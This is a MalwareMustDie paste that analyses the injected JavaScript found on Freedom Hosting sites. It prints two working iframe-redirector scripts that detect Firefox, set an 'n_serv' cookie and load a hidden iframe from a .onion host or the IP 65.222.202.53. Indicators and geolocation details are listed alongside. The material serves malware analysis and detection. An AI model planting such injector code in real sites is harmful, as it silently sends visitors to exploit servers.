Googleinurl

Freedom Hosting FBI IFRAME Redirector Malware Script

Jan 15th, 2015
  1. # MalwareMustDie!
  2. # This is the set of malicious JavaScript code that was injected into the Freedom Hosting site
  3. # It contains the IFRAMER malware method, which redirects the victim to the infector site at this URL:
  4. # http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0
  5. #
  6. # Original copy at: www.twitlonger.com/show/n_1rlo0uu
  7. # See the Iframer part and tell me if this is NOT adopting malware techniques, and NOT blindly infecting every visitor to that site!!
  8. # Anyone who accessed an FH site with Firefox & JavaScript enabled must have been affected by this IFRAMER.
  9. # Case: FBI infects malware in public anonymous network http://blog.malwaremustdie.org/2014/08/what-is-bad-stays-bad-legalized-any.html
  10. # Ref: http://www.reddit.com/r/onions/comments/1jmrta/founder_of_the_freedom_hosting_arrested_held/
  11. # Ref: https://www.mozilla.org/security/announce/2013/mfsa2013-53.html
  12. # Ref: http://www.twitlonger.com/show/n_1rlo0uu
  13. # Ref: http://pastebin.com/bu2Ya0n6
  14. # Ref: http://pastebin.com/pmGEj9bV
  15.  
  16. // Case 1
  17.  
  18.     function createCookie(name,value,minutes) {
                  // Writes `name=value` to document.cookie with path=/ (applies site-wide).
                  // A truthy `minutes` adds an expires attribute that many minutes from now;
                  // otherwise no expires attribute is written.
                  // name and value are concatenated as-is, with no encoding.
  19.             if (minutes) {
  20.                     var date = new Date();
  21.                     date.setTime(date.getTime()+(minutes*60*1000));
  22.                     var expires = "; expires="+date.toGMTString();
  23.             }
  24.             else var expires = "";
  25.             document.cookie = name+"="+value+expires+"; path=/";
  26.     }
  27.      
  28.     function readCookie(name) {
              // Looks `name` up in document.cookie: splits on ';', strips leading spaces
              // from each piece, and returns the text after "name=" for the first piece
              // that starts with it. Returns null when no piece matches.
  29.         var nameEQ = name + "=";
  30.         var ca = document.cookie.split(';');
  31.         for(var i=0;i < ca.length;i++) {
  32.             var c = ca[i];
  33.             while (c.charAt(0)==' ') c = c.substring(1,c.length);
  34.             if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
  35.         }
  36.         return null;
  37.     }
  38.      
  39.     function isFF() {
              // Browser gate: true when any of three Firefox indicators is present --
              // document.getBoxObjectFor or window.mozInnerScreenX is neither null nor
              // undefined, or the user-agent string matches /Firefox/i.
              // NOTE(review): presumably the framed content is Firefox-specific (the paste
              // header cites Mozilla advisory mfsa2013-53) -- not shown in this script.
  40.         return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent));
  41.     }
  42.      
  43.     function updatify() {
              // Builds an iframe (no border, no scrolling, height "5") and appends it to
              // document.body, so the visitor's browser loads the remote URL inside the page.
              // Indicators for detection: the .onion host in `src` and the requestID UUID,
              // which is the same value format_quick() stores in the n_serv cookie.
  44.         var iframe = document.createElement('iframe');
  45.         iframe.style.display = "inline";
  46.         iframe.frameBorder = "0";
  47.         iframe.scrolling = "no";
  48.         iframe.src = "http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0";
  49.         iframe.height = "5";
  50.         iframe.width = "*";
  51.         document.body.appendChild(iframe);
  52.     }
  53.      
  54.     function format_quick() {
              // Once-per-cookie gate: if no n_serv cookie is readable, set it (30-minute
              // expiry) and inject the iframe via updatify(). While the cookie is still
              // present the iframe is not injected again.
              // The cookie name "n_serv" and its UUID value are usable as indicators.
  55.         if ( ! readCookie("n_serv") ) {
  56.             createCookie("n_serv", "203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0", 30);
  57.             updatify();
  58.         }
  59.     }
  60.      
  61.     function isReady()
  62.     {
              // Entry point. Polls document.readyState every 250 ms; once it is
              // "interactive" or "complete", runs format_quick() only if isFF() is true.
              // No further poll is scheduled after the document is ready.
  63.         if ( document.readyState === "interactive" || document.readyState === "complete" ) {
  64.      
  65.             if ( isFF() ) {
  66.                 format_quick();
  67.             }
  68.         }
  69.         else
  70.         {
                  // Document not ready yet: check again in 250 ms.
  71.             setTimeout(isReady, 250);
  72.         }
  73.     }
  74.     setTimeout(isReady, 250); // first readiness check, 250 ms after the script is evaluated
  75.  
  76.  
  77. // Case 2
  78.  
  79. function createCookie(name, value, minutes) {
          // Sets a cookie `name=value` scoped to path=/. If `minutes` is truthy the
          // cookie gets an expires attribute that far in the future; if not, the
          // expires attribute is omitted. Neither name nor value is encoded.
  80.     if (minutes) {
  81.         var date = new Date();
  82.         date.setTime(date.getTime() + (minutes * 60 * 1000));
  83.         var expires = "; expires=" + date.toGMTString();
  84.     } else var expires = "";
  85.     document.cookie = name + "=" + value + expires + "; path=/";
  86. }
  87.  
  88. function readCookie(name) {
          // Returns the value of cookie `name`, or null if it is absent. Each
          // ';'-separated piece of document.cookie has its leading spaces removed and
          // is then tested for the "name=" prefix; the first match wins.
  89.     var nameEQ = name + "=";
  90.     var ca = document.cookie.split(';');
  91.     for (var i = 0; i < ca.length; i++) {
  92.         var c = ca[i];
  93.         while (c.charAt(0) == ' ') c = c.substring(1, c.length);
  94.         if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length);
  95.     }
  96.     return null;
  97. }
  98.  
  99. function isFF() {
          // Firefox check used to decide whether the iframe is injected. Returns true
          // if document.getBoxObjectFor or window.mozInnerScreenX is defined and
          // non-null, or if navigator.userAgent contains "Firefox" (case-insensitive).
  100.     return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent));
  101. }
  102.  
  103. function updatify() {
           // Appends a borderless, non-scrolling iframe (height "5") to document.body.
           // Here `src` is a plain IP address over http rather than an .onion host, so the
           // request carries the requestID UUID to that address.
           // Indicators for detection: the IP in `src` and the requestID UUID, which
           // freedomhost() also stores as the n_serv cookie value.
  104.     var iframe = document.createElement('iframe');
  105.     iframe.style.display = "inline";
  106.     iframe.frameBorder = "0";
  107.     iframe.scrolling = "no";
  108.     iframe.src = "http://65.222.202.53/?requestID=eb5f2c80-fc81-11e2-b778-0800200c9a66"; <== (1) 1ST CALLBACK SELF EXPLANATORY
           // The "<== (1) ..." text on the line above is the analyst's marker in the paste,
           // not part of the injected script.
  109.     iframe.height = "5";
  110.     iframe.width = "*";
  111.     document.body.appendChild(iframe);
  112. }
  113.  
  114. function freedomhost() {
           // Same gate as format_quick() in Case 1 under a different name: when no n_serv
           // cookie is readable, store the UUID in it for 30 minutes and call updatify().
           // A browser that still holds the cookie does not get the iframe again.
  115.     if (!readCookie("n_serv")) {
  116.         createCookie("n_serv", "eb5f2c80-fc81-11e2-b778-0800200c9a66", 30);
  117.         updatify();
  118.     }
  119. }
  120.  
  121. function isReady() {
           // Entry point. Re-schedules itself every 250 ms until document.readyState is
           // "interactive" or "complete", then calls freedomhost() if isFF() is true.
  122.     if (document.readyState === "interactive" || document.readyState === "complete") {
  123.         if (isFF()) {
                   // The commented-out alert below is a disabled debug line in the sample.
  124.             //window.alert(window.location + "Firefox Detected.")
  125.             freedomhost();
  126.         }
  127.     } else {
               // Document still loading: poll again in 250 ms.
  128.         setTimeout(isReady, 250);
  129.     }
  130. }
  131. setTimeout(isReady, 250); // schedules the first isReady() poll 250 ms after the script runs
  132.  
  133. // Note: both cases use the same method;
  134. // the second script calls back to a plain IP address, contacting the remote host on the line marked (1)
  135.  
  136.   IP Address: 65.222.202.53
  137.   City: Triadelphia
  138.   State or Region: West Virginia
  139.   Country: United States
  140.   ISP: Verizon Business
  141.   Latitude & Longitude: 40.0900, -80.6220
  142.   Domain: verizonbusiness.com
  143.   ZIP Code: 26059
  144.  
  145. ---
  146. #MalwareMustDie! @unixfreaxjp